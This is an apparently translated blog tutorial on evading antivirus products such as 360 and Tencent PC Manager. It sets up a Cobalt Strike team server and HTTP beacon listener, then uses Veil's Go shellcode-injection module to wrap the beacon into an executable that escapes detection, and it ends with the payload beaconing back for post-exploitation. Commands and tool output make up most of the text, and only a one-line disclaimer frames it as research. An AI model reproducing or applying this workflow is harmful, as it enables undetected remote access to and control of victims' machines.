生活随笔
Python autostart and bypassing 360: notes from one antivirus-evasion attempt

Published: 2024/1/23 · python · 豆豆

1. Background

During red-team engagements the target machine very often has some antivirus product installed, such as 360 or Tencent PC Manager. The result is that the generated payload can never be used and keeps getting forcibly deleted by the AV. This is really annoying, annoying to death! The only option was to stop and study how AV works and how to get around it. I am writing it down here as a memo.

2. Tools needed

Cobalt Strike: software used in red-team engagements that provides team collaboration and payload generation. It consists of two parts, a server side and a client side. The server runs only on Linux; the client runs on macOS, Windows and Linux. Java must be installed before it will run.

Related link:

Adversary Simulation and Red Team Operations Software: www.cobaltstrike.com

Veil: a tool that generates payloads and evades antivirus.

Related link:

https://github.com/Veil-Framework/Veil

3. Evasion steps

3.1 Set up the CS team server and client

A reminder: if the files in the extracted CS directory do not have execute permission, CS cannot run, so add execute permission to the files in the CS directory:

chmod +x <filename>

Run the CS team server:

(base) root@kali:~/python/cs4.0# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.91.156  netmask 255.255.255.0  broadcast 192.168.91.255
        inet6 fe80::20c:33ff:dfbf:dfa3  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:bf:3a:23  txqueuelen 1000  (Ethernet)
        RX packets 130003  bytes 193285222 (184.3 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 81397  bytes 4399635 (4.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
        device interrupt 19  base 0x2000

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 24  bytes 1356 (1.3 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 24  bytes 1356 (1.3 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

(base) root@kali:~/python/cs4.0# ./teamserver 192.168.91.156 123456
[*] Will use existing X509 certificate and keystore (for SSL)
[+] Team server is up on 50050
[*] SHA256 hash of SSL cert is:
[+] Listener: test started!

Run the CS client

Click [Connect] to open the CS client.

3.2 Generate a payload with CS

Set the listener type to HTTP.

Select [Choose] and save the generated payload to a folder for later use.

3.3 Install Veil

The quick install command on Kali is recommended:

apt -y install veil
/usr/share/veil/config/setup.sh --force --silent

Installation is fairly slow and requires a proxy.

The installer downloads and installs its dependencies automatically; a successful install looks like the figure:

Inside Veil, enter

use 1

Veil has 41 payloads in total; enter list to display all of them:

===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 [*] Available Payloads:

	1)	autoit/shellcode_inject/flat.py
	2)	auxiliary/coldwar_wrapper.py
	3)	auxiliary/macro_converter.py
	4)	auxiliary/pyinstaller_wrapper.py
	5)	c/meterpreter/rev_http.py
	6)	c/meterpreter/rev_http_service.py
	7)	c/meterpreter/rev_tcp.py
	8)	c/meterpreter/rev_tcp_service.py
	9)	cs/meterpreter/rev_http.py
	10)	cs/meterpreter/rev_https.py
	11)	cs/meterpreter/rev_tcp.py
	12)	cs/shellcode_inject/base64.py
	13)	cs/shellcode_inject/virtual.py
	14)	go/meterpreter/rev_http.py
	15)	go/meterpreter/rev_https.py
	16)	go/meterpreter/rev_tcp.py
	17)	go/shellcode_inject/virtual.py
	18)	lua/shellcode_inject/flat.py
	19)	perl/shellcode_inject/flat.py
	20)	powershell/meterpreter/rev_http.py
	21)	powershell/meterpreter/rev_https.py
	22)	powershell/meterpreter/rev_tcp.py
	23)	powershell/shellcode_inject/psexec_virtual.py
	24)	powershell/shellcode_inject/virtual.py
	25)	python/meterpreter/bind_tcp.py
	26)	python/meterpreter/rev_http.py
	27)	python/meterpreter/rev_https.py
	28)	python/meterpreter/rev_tcp.py
	29)	python/shellcode_inject/aes_encrypt.py
	30)	python/shellcode_inject/arc_encrypt.py
	31)	python/shellcode_inject/base64_substitution.py
	32)	python/shellcode_inject/des_encrypt.py
	33)	python/shellcode_inject/flat.py
	34)	python/shellcode_inject/letter_substitution.py
	35)	python/shellcode_inject/pidinject.py
	36)	python/shellcode_inject/stallion.py
	37)	ruby/meterpreter/rev_http.py
	38)	ruby/meterpreter/rev_https.py
	39)	ruby/meterpreter/rev_tcp.py
	40)	ruby/shellcode_inject/base64.py
	41)	ruby/shellcode_inject/flat.py

We pick the Go-language module to build the shellcode loader:

Veil/Evasion>: use 17
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 Payload Information:

	Name:		Golang Flat Shellcode Injector
	Language:	go
	Rating:		Normal
	Description:	Golang VirtualAlloc method for inline shellcode
			injection

Payload: go/shellcode_inject/virtual selected

 Required Options:

Name			Value		Description
----			-----		-----------
BADMACS			FALSE		Check for VM based MAC addresses
CLICKTRACK		X		Require X number of clicks before execution
COMPILE_TO_EXE		Y		Compile to an executable
CURSORCHECK		FALSE		Check for mouse movements
DISKSIZE		X		Check for a minimum number of gigs for hard disk
HOSTNAME		X		Optional: Required system hostname
INJECT_METHOD		Virtual		Virtual or Heap
MINPROCS		X		Minimum number of running processes
PROCCHECK		FALSE		Check for active VM processes
PROCESSORS		X		Optional: Minimum number of processors
RAMCHECK		FALSE		Check for at least 3 gigs of RAM
SLEEP			X		Optional: Sleep "Y" seconds, check if accelerated
USERNAME		X		Optional: The required user account
USERPROMPT		FALSE		Prompt user prior to injection
UTCCHECK		FALSE		Check if system uses UTC time

 Available Commands:

	back		Go back to Veil-Evasion
	exit		Completely exit Veil
	generate	Generate the payload
	options		Show the shellcode's options
	set		Set shellcode option

Enter [generate]:

[go/shellcode_inject/virtual>>]: generate

 [?] Generate or supply custom shellcode?

     1 - Ordnance (default)
     2 - MSFVenom
     3 - Custom shellcode string
     4 - File with shellcode (\x41\x42..)
     5 - Binary file with shellcode

 [>] Please enter the number of your choice: 3
 [>] Please enter custom shellcode (one line, no quotes, \x00.. format):

At that prompt paste the payload generated by CS, then set the output name, and an evasive payload is produced. Note that Veil asks for a base name and appends the extension itself; the author typed helloworld.exe, which is why the output below ends up as helloworld.exe.exe.

[*] Using pre-generated shellcode...
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 [>] Please enter the base name for output files (default is payload): helloworld.exe
runtime/internal/sys
runtime/internal/atomic
runtime
errors
internal/race
sync/atomic
math
internal/syscall/windows/sysdll
unicode/utf16
unicode/utf8
sync
io
syscall
strconv
internal/syscall/windows
internal/syscall/windows/registry
time
reflect
os
fmt
command-line-arguments
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 [*] Language: go
 [*] Payload Module: go/shellcode_inject/virtual
 [*] Executable written to: /var/lib/veil/output/compiled/helloworld.exe.exe
 [*] Source code written to: /var/lib/veil/output/source/helloworld.exe.go

The shell output states where the generated payload is stored. Locate that file and run it in a virtual machine with Tencent PC Manager installed to see whether it gets flagged.

Next, scan the payload we just generated with PC Manager.

It gets past Tencent PC Manager. After that it is just double-click to run, wait for the beacon to check in to CS, and go straight into post-exploitation.

The above content is for security research only; do not use it for anything illegal. Hold your own bottom line and be a law-abiding citizen.
